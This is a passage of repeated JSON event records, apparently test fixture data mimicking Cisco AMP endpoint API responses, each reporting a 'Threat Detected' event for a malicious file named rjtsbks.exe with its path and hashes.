Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":317000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":286000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":208000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":208000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163578","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":192000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163577","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":192000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163576","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":145000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163575","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":145000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163574","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":130000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163573","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":130000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163572","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":130000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163571","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163570","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163568","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163567","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":83000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163566","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":67000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163565","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":67000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163564","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":20000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163563","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 